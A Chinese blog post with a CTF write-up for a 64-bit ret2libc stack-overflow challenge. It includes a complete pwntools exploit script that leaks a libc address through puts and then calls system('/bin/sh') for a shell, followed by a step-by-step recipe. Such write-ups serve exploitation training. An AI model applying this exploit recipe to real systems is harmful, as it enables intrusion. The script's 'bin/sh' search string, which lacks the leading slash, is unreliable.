《pwn》ret2libc2—x64简答例题+脚本加解析

已于 2022-04-22 19:53:46 修改
阅读量687 收藏 6
点赞数 3
文章标签: 其他
于 2022-03-28 00:54:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Boyfml/article/details/123784731
版权

题目地址:链接:

https://pan.baidu.com/s/1isG2u-fpihbPt_Lumd4q5A?pwd=r9vn
提取码:r9vn

脚本展示:

from pwn import*
p=process('./babyrop')
context.log_level='debug'
gdb.attach(p)
elf=ELF("./babyrop")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
padding=0x28
pop_rdi_ret_addr=0x400733
#ida观察puts函数作为泄露函数,并且参数只有一个,因此,我们ROPgadget寻找rdi_ret即可满足。
overflow_addr=0x40067D

payload='a'*0x28+p64(pop_rdi_ret_addr)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(overflow_addr)
#栈溢出——rdi——ret——got表传给rdi中——ret到plt表调用puts函数——ret到泄露函数地址
p.sendafter("Pull up your sword and tell me u story!\n",payload)
在此步骤前运行下脚本观察接收到几个字节。决定下一步接受几个字节,然后ljust扩充到8字节满足16进制u64解包。
libc_base_addr=u64(p.recv(6).ljust(8,'\x00'))-libc.symbols['puts']
print(hex(libc_base_addr))
#打印出来libc基址,验证前面脚本是否出错。
system_addr=libc_base_addr+libc.symbols['system']
binsh=libc_base_addr+libc.search("bin/sh\x00").next()
sleep(1)
#程序暂停一秒,防止两个payload一起发送
payload='a'*0x28+p64(pop_rdi_ret_addr)+p64(binsh)+p64(system_addr)
#binsh传入rdi,ret返回system函数
p.send(payload)
p.interactive()

总结本题套路(一定要看!!!)

代码前五行当作固定格式!!!记得改下代码里文件名字,如果这都不会没必要接着往下面看了!!!
先shift+f12查看有无system,binsh
elf=ELF(“文件名”)开局就写
libc=ELF(“libc储存文件夹地址”)用ldd命令查找!
没有就查找puts,write等函数作为泄露函数。
找到溢出函数地址用ida
根据泄露函数参数,使用ROPgadget指令寻找pop地址,不同参数,选择不同的pop地址。也意味着不同的传参数量。
开始根据传参规则构建payload1。
payload1=padding+rdi——ret+got表+plt表+overflow地址;plt表一定要有!
构建完泄露函数payload1后,我们直接发送(记得吃无用字符)。
发送payload1后,我们会得到n个字节。我们根据得到字节的个数进行u64解包.又因为是64位程序,得到的字节不满8bit,我们必须补充到8bit才能u64解包。
libc_base_addr1(带有泄露函数偏移的地址)=u64(p.recv(n).ljust(8,‘\x00’))
#就当作固定格式。\x00是为了补充到8字节后不继续读取
libc_base_addr2(真正地址)=libc_base_addr1(带有偏移的地址)-libc.symbols[‘泄露函数名字’]
有了libc的真实基地址。我们开始寻找libc库函数中,system函数的地址。
system_addr=libc.symbols[‘system’]
同理有了system函数的地址还不够,我们仍然需要bin/sh作为system的参数然后,再返回system(“bin/sh”)!
故此我们再从libc库函数中寻找binsh参数。
libc_addr=libc_base_addr+libc.search(“bin/sh\x00”).next()
欧克,万事俱备只差再次溢出一次了。
我们再次构建溢出函数payload2
payload2=padding+pop_rdi_ret地址+binsh参数传进rdi+system地址传入ret中。返回到system函数中,且system函数会向rdi中读取参数,既运行system(“bin/sh”)成功getsgell!
p.send(payload2)
getshell!
出现bin/dash

Aiyflowers
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2libc2pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
CTF-Show-ret2libc_64(内部赛签到题)
m0_49666584的博客
11-23 3719
0x00 checksec: 64位程序,仅开NX gdb调试: 有一个输出点和一个输入点 0x01 IDA看一下伪代码 int main() { char v4[160]; setvbuf(_bss_start, 0LL, 1, 0LL); write(1, "[Welcome XCITC-CTF]\nnow,Try Pwn Me?\n", 0x24uLL); gets(v4);//溢出点 return 0; } gets函数存在溢出,...
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 4423
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】
qq_73149934的博客
12-06 253
BUUCTF--pwn--ciscn_2019_c_1
pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)
Bossfrank的博客
12-08 4810
本文详解了pwn题目中ret2libc的解题思路。简要介绍了plt表和got表的意义以及Linux中的延迟绑定技术,并通过32位和64位的两个具体题目具体的介绍了解pwn题的完整过程。
linux中ret2libc入门与实践
counsellor的专栏
08-23 6758
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
pwn练习题
WuMing_Z的博客
02-23 893
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
PWN题[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4181
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
[第五空间2019 决赛]PWN51解题
最新发布
2301_81504456的博客
03-11 510
主要格式化字符串漏洞利用,后面添recvline及脚本编写说明仅为个人理解🌹🌹🌹(个人还是小白一枚)希望帮助理解,望大家多多指出错误及正确理解做法。
ret2libc_x64一道经典例题全过程解释
Aiyflwoers的博客
03-27 768
i love pwn
CTFShow pwn07 (ret2libc-64bit
Mintind的博客
12-03 1083
CTFShow pwn07解题记录
新手打pwn
m0_74736832的博客
07-05 901
攻击者可以使用格式化字符串的特性,将一个特定的值写入到可以修改canary的位置上,从而绕过检测。它是C语言中的标准函数库,提供了各种基础函数和数据类型的定义,以及多个常用功能的实现。弹出时的数据顺序:由于栈的"先进后出"原则,"pop"指令弹出的数据顺序与它们被"push"到栈中的顺序相反。当使用"pop"指令弹出数据时,栈指针会自动向下移动,指向新的栈顶位置。x86架构(如Intel和AMD处理器)中的"pop"指令:在x86汇编语言中,"pop"指令用于将栈顶的数据弹出并存储到目标操作数中。
pwn做题过程
2303_79500944的博客
01-19 311
将二进制文件拖入ida发现无后门程序,想到要生成shellcode,用shellcraft.sh()生成,asm(shellcraft.sh()),用gdb找ebx-eax的值,payload=(ebp-eax)转换成10进制+4(文件为32字节,64字节应为8)+p32(bass区地址).
基本ROP之ret2libc2
至臻求学,胸怀云月
02-14 3600
原理 ret2libc即控制函数执行libc中的函数,通常是返回至某个函数plt表处或者函数的具体位置(即函数对应的got表项的内容),一般情况下我们选择执行system("/bin/sh"),故而我们需要知道system函数的地址 过程 下载地址:url checksec IDA分析 gets函数 system函数 经计算gets字符串和ebp的偏移为108,这里不进行赘述 查找bin/s...
ELF文件详解—初步认识
weixin_44966641的博客
09-16 1802
ELF文件详解—初步认识 转自:https://blog.csdn.net/daide2012/article/details/73065204 一、  引言 在讲解ELF文件格式之前,我们来回顾一下,一个用C语言编写的高级语言程序是从编写到打包、再到编译执行的基本过程,我们知道在CPU上执行的是低级别的机器语言,从高级语言到低级别的机器语言肯定是要经过翻译过程,这个过程大体的过程如下图所示: &
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值